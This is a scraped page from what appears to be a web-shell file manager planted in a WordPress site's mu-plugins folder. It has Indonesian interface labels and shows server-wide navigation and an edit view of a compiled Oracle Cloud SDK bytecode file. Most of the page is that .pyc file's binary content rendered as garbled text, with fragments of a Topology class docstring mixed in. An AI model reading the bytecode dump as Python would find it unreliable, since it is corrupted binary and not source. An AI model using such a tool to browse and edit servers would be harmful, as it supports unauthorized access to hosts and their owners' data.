📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
oci
›
core
›
models
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/oci/core/models/__pycache__
💾
Free:
45.6 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: topology.cpython-39.pyc
a ���f� � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdZdZdZdd� Ze dd � �Z ed d� �Zej dd� �Zed d� �Zej dd� �Zedd� �Zej dd� �Zedd� �Zej dd� �Zedd� �Zej dd� �Zdd� Zdd� Zdd� ZdS ) �TopologyzC Defines the representation of a virtual network topology. � NETWORKING�VCN�SUBNET�PATHc K sF dddddd�| _ ddd d dd�| _d| _d| _d| _d| _d| _dS ) aR Initializes a new Topology object with values from keyword arguments. This class has the following subclasses and if you are using this class as input to a service operations then you should favor using a subclass over the base class: * :class:`~oci.core.models.VcnTopology` * :class:`~oci.core.models.NetworkingTopology` * :class:`~oci.core.models.SubnetTopology` The following keyword arguments are supported (corresponding to the getters/setters of this class): :param type: The value to assign to the type property of this Topology. Allowed values for this property are: "NETWORKING", "VCN", "SUBNET", "PATH" :type type: str :param entities: The value to assign to the entities property of this Topology. :type entities: list[object] :param relationships: The value to assign to the relationships property of this Topology. :type relationships: list[oci.core.models.TopologyEntityRelationship] :param limited_entities: The value to assign to the limited_entities property of this Topology. :type limited_entities: list[str] :param time_created: The value to assign to the time_created property of this Topology. :type time_created: datetime �strzlist[object]z list[TopologyEntityRelationship]z list[str]Zdatetime)�type�entities� relationships�limited_entities�time_createdr r r ZlimitedEntitiesZtimeCreatedN)Z swagger_typesZ attribute_map�_type� _entities�_relationships�_limited_entities� _time_created)�self�kwargs� r �</usr/lib/python3.9/site-packages/oci/core/models/topology.py�__init__"